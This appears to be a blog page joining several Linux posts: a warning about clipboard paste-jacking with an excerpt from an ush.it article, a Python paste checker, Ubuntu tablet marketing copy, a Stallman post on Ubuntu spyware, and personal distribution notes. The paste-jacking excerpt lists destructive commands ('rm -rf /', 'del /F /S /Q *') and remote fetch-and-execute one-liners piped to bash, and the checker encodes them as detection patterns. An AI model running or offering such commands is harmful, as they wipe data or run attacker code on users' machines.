Copy Paste Tricks back to their old tricks again

In an article on The H, they explain why it’s not good to simply copy and paste stuff you get from a website tutorial. What seems like a harmless command could be hiding something very dangerous.

When a user pastes what they think is an innocent command that does what the page they copied it from advertises, another command is actually executed with their credentials automatically. This could delete all of their data or send them to a server on the public internet. If the user is still authenticated with sudo on a Linux machine, the command could even be executed with administrator privileges, which could lead to much more dangerous results.

See the article here

User interaction based exploitation: WYSINWYC (What you see is not what you copy)

When working with computers you know whether or not there is a reliable and deterministic way to exploit them; indeed, when working with humans there’s no certainty. Technical people often prefer to stay technical and avoid humans. This is in fact our first article which needs direct human interaction to work.

The presented technique relies on a special type of “rich text” copy where the apparently innocuous payload is pasted in a different context able to parse it. This is especially true of, but definitely not limited to, online how-tos.

The core concept of the attack is that the displayed text (and thus the data the user thinks they have copied) is different from what the browser has in reality copied.

A list of real-life examples follows, just to give you an idea.

Small commands:

rm -rf /
del /F /S /Q * # windows
/opt/custom/app abuse_my_functionality
echo "*" > ~/.rhost

Remote storage over http

GET example.com|bash
wget -q example.com -O-|bash
curl -s example.com|bash
echo -en "GET /\n\n"|nc example.com 80|bash

The shortest that comes to my mind is “GET ush.it|sh” (13 chars).

Other remote storage fetch methods

nc example.com
dig AXFR evil.com @evil-dns-with-53-tcp # since zone transfers use TCP

As you can see, small commands are limited in terms of flexibility, and remote fetch/exec can be made useless by network protections (egress filtering, my-work-is-grep IDS) and configuration issues (missing routing, machine offline, personal firewall, etc).

Excerpted from an article on ush.it
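
A defensive check for the pattern described above, as an added example that is not part of the original post or the ush.it article: it lists every line a shell would receive from a paste and flags the command shapes quoted in the excerpt. The function name `review_paste`, the regular expressions and the sample clipboard string are constructed for illustration.

```python
import re

# Shapes from the "remote storage" list above: a fetch tool whose output is
# piped into a shell interpreter on the same line.
FETCH_TO_SHELL = re.compile(
    r"\b(?:GET|wget|curl|nc|dig)\b[^\n]*\|\s*(?:ba|da|z|k)?sh\b")
# Destructive one-liners from the "small commands" list above.
DESTRUCTIVE = re.compile(r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*f|\bdel\s+/F\b|>\s*~/\.rhost")
# C0 control characters other than tab, LF and CR (handled below), plus DEL.
CONTROL = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def review_paste(pasted):
    """Return (commands, findings) for text about to be pasted into a shell.

    commands: every line the shell would receive, so hidden ones become visible.
    findings: short reason strings; an empty list means nothing was flagged.
    """
    findings = []
    # Normalise CRLF / lone CR so each line terminator counts once.
    text = pasted.replace("\r\n", "\n").replace("\r", "\n")
    commands = [line for line in text.split("\n") if line.strip()]
    if "\n" in text:
        findings.append("line terminator present: the shell runs the text on paste")
    if len(commands) > 1:
        findings.append(f"{len(commands)} commands in one paste")
    if CONTROL.search(text):
        findings.append("non-printable control character")
    for cmd in commands:
        if FETCH_TO_SHELL.search(cmd):
            findings.append(f"remote fetch piped to a shell: {cmd!r}")
        if DESTRUCTIVE.search(cmd):
            findings.append(f"destructive command: {cmd!r}")
    return commands, findings


# Constructed sample: the page displayed only "ls -l", the clipboard held this.
SAMPLE_CLIPBOARD = "ls -l\ncurl -s example.com|bash\n"

if __name__ == "__main__":
    cmds, found = review_paste(SAMPLE_CLIPBOARD)
    for c in cmds:
        print("would run:", c)
    for f in found:
        print("flag:", f)
```

Pasting into a plain-text editor first gives the same visibility by hand; the function only automates reading the result.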

Ubuntu Tablet

Finally the next step in a fully integrated system setup.
Desktop, Phone, TV, Tablet … All running the same OS fully integrated. Welcome to the future.

The tablet OS will be made available to devs and enthusiasts at the exact same time as the smartphone preview on February 21st. So in addition to the Galaxy Nexus and Nexus 4, you’ll also be able to get a taste of touch-based Ubuntu on a Nexus 7 or Nexus 10.

Ubuntu’s unique side stage places a phone and a tablet app on the same screen at the same time for amazing tablet productivity. True multitasking comes to the tablet. Take calls in Skype while you work in a document, make notes on the side while you surf the web, tweet while you watch a movie. Or use apps collaboratively – drag content from one app to another for a super-productive day. We’ve reinvented the tablet as a bridge between phone and PC.

Multi Accounts

Your Ubuntu tablet has multiple secure user accounts, and a guest account. Perfect for families and friends, and ideal for the office, with secure multi-user logins that make using and sharing devices safe.

Magic Edges

Use all four edges of the screen to navigate between apps, settings and controls. There are no buttons on the Ubuntu tablet, you don’t have to keep returning to the home screen every time you want to switch apps – everything is available at a swipe. Leaner, cleaner, more elegant hardware designs are possible with Ubuntu – the result is a joy to use.

Instant Launch

The left edge holds your favourite apps, so all the things you use most are only a touch away. Here you can see what’s running, switch between apps or launch your favourites quickly.

Voice Control HUD

The Ubuntu HUD makes complex application workflows simple on touch devices. This brings all the power of the PC to your touch device. And with voice control, it’s as if you had an extra set of hands – a truly personal assistant.


Instant share and Cloud

Sharing is now built-in, with support for all the major networks. So any app can let you share with friends, family and co-workers. One touch is all it takes. Facebook and Twitter aren’t the only ways to share. Ubuntu One already has millions of users on Ubuntu, Android, Windows and Mac. Deeply integrated on Ubuntu devices, it provides free storage, paid-for music streaming services and a foundation for cloud-based services from operators and device makers.


Web applications sit alongside native apps as equal citizens on Ubuntu – with their own icons and access to system services. Facebook, Twitter, Google Maps, Gmail and Spotify are all available from day one – thanks to Ubuntu’s brilliant web app system, developers can easily make their site install on the tablet as an app. We aren’t limited to HTML5. Native apps are blazingly fast, taking advantage of the full capabilities of the tablet’s processor and graphics hardware. A mobile SDK does most of the work for you, giving you that Ubuntu style. It’s easy for Android and Blackberry developers to publish for the Ubuntu audience too, and since you’re already running Ubuntu on your development workstations, everything you need is at your fingertips.


Ubuntu presents results from hundreds of sources in one gorgeous page, saving you the trouble of comparison shopping or hunting down the right provider. You’ll see information from your email and phone contacts alongside Facebook friends and followers on Twitter. Looking for music? Ubuntu doesn’t just search the tunes on your tablet, it also searches online, giving you a choice of tracks you don’t yet own. It’s really one search to rule them all.


The stylish home screen organises all your most important information, selected from hundreds of sources – online or on board. You can customise the screen and search for any kind of content. Watch what you want with a single touch – no need to worry which app to find it in.


Just add a keyboard and mouse and your high-end tablet becomes a PC that’s ready for business. Ubuntu is popular in the enterprise for its robust security, great usability and standard management. The addition of a tablet experience provides complete mobility as well as productivity. Since it is all pure Ubuntu, the tablet can do everything a desktop computer can, including act as a thin client with access to remote Windows apps and desktops. The best of all worlds, in one device.

One app on Ubuntu for all form factors

Perhaps the most exciting thing about writing native apps for Ubuntu is the opportunity to write and build a single app with responsive interfaces that allow it to run on any Ubuntu device. In other words, you can use the Ubuntu SDK to build your app and, with some care and attention, make it available to users of Ubuntu PCs, phones and tablets – all in a single upload to the Ubuntu Software Centre.

Ubuntu now fits your phone

Introducing the superphone that’s also a full PC

  • Your phone is more immersive, the screen is less cluttered, and you flow naturally from app to app with edge magic. The phone becomes a full PC and thin client when docked.
  • With all-native core apps and no Java overhead, Ubuntu runs well on entry-level smartphones – yet it uses the same drivers as Android.

Stallman says Ubuntu spyware makes it just as bad as Windows

Posted by Richard Stallman at Dec 07, 2012 01:53 AM
One of the major advantages of free software is that the community protects users from malicious software. Now Ubuntu GNU/Linux has become a counterexample. What should we do?

Proprietary software is associated with malicious treatment of the user: surveillance code, digital handcuffs (DRM or Digital Restrictions Management) to restrict users, and back doors that can do nasty things under remote control. Programs that do any of these things are malware and should be treated as such. Widely used examples include Windows, the iThings, and the Amazon “Kindle” product for virtual book burning, which do all three; Macintosh and the Playstation III which impose DRM; most portable phones, which do spying and have back doors; Adobe Flash Player, which does spying and enforces DRM; and plenty of apps for iThings and Android, which are guilty of one or more of these nasty practices.

Free software gives users a chance to protect themselves from malicious software behaviors. Even better, usually the community protects everyone, and most users don’t have to move a muscle. Here’s how.

Once in a while, users who know programming find that a free program has malicious code. Generally the next thing they do is release a corrected version of the program; with the four freedoms that define free software (see http://www.gnu.org/philosophy/free-sw.html), they are free to do this. This is called a “fork” of the program. Soon the community switches to the corrected fork, and the malicious version is rejected. The prospect of ignominious rejection is not very tempting; thus, most of the time, even those who are not stopped by their consciences and social pressure refrain from putting malfeatures in free software.

Custom repos for Ubuntu 10.04 LTS Lucid Lynx

I had to set up an Ubuntu laptop for a customer. Tried to get him on Debian or Mint at least, but he refused to accept anything but Ubuntu as he was advised by the Tech guy at his work to go with Ubuntu. I went ahead and set up the 10.04 LTS version and advised him not to upgrade until after 11-2013 when Canonical will stop supporting it. Hopefully by then he would have learned enough and would be willing to try Debian.

After the install, I did a custom setup for his updates and packages. I thought I would share it with you all. You can also choose to not include the Third Party stuff.

Linux Mint – A Quick Overview

I had been a faithful follower of Ubuntu since my introduction to Linux a few years back and I dipped my toes in the Fedora and Debian pools for a bit as well. Recently Ubuntu decided to change things up with the Unity desktop and while it’s nice and flashy, it leaves a lot to long for from a System Administrator aspect, for me at least. They are focusing too much on being the eye candy of Linux and competing with Windows for who looks better, in that process they are leaving behind the reason we use Linux instead of Windows.

Ubuntu at one time was poised on becoming the desktop Linux market. Now don’t get me wrong, there are still plenty of reasons to stay with Ubuntu, especially if you are not a power user, my problem is that they choose to FORCE their choices upon us users, much to the Microsoft way instead of leaving an option like they did with their earlier release.

